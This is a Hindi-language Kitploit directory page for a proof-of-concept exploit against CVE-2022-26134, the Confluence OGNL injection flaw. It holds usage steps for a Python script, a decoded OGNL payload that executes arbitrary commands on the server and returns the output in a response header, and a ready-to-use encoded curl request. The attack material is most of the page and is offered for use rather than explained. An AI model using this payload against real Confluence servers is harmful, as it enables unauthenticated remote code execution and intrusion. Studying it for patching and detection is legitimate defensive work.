Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-26134 — CVE-2022-26134 Confluence OGNL Injection POC | Kitploit
उपकरण/GitHubGitHub/alcaparra/cve-2022-26134
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubalcaparra/cve-2022-26134

CVE-2022-26134

CVE-2022-26134 Confluence OGNL Injection POC

रिपॉजिटरी देखें
4214 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-26134 POC

विवरण

root@kitploit:~
Confluence Server और Data Center के प्रभावित संस्करणों में, 
एक OGNL इंजेक्शन भेद्यता मौजूद है, जो एक बिना प्रमाणीकरण वाले हमलावर को 
Confluence Server या Data Center इंस्टेंस पर मनमाना कोड निष्पादित करने की अनुमति देती है।

POC

  1. python3 confluence.py -u http://127.0.0.1 -c whoami चलाएँ
  2. फ़ायदा उठाएँ

पेलोड

URL-डिकोडेड पेलोड:

root@kitploit:~
/${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("COMMAND").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/

यह कमांड को लक्षित सर्वर पर निष्पादित करता है और आउटपुट को X-Cmd-Response हेडर के अंदर वापस भेजता है।

आप curl का भी उपयोग कर सकते हैं:

root@kitploit:~
टूल डाउनलोड करें
curl -kI "http://127.0.0.1/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"

संदर्भ

  • https://www.cvedetails.com/cve/CVE-2022-26134 (रेटेड नहीं)
  • https://jira.atlassian.com/browse/CONFSERVER-79016
  • https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/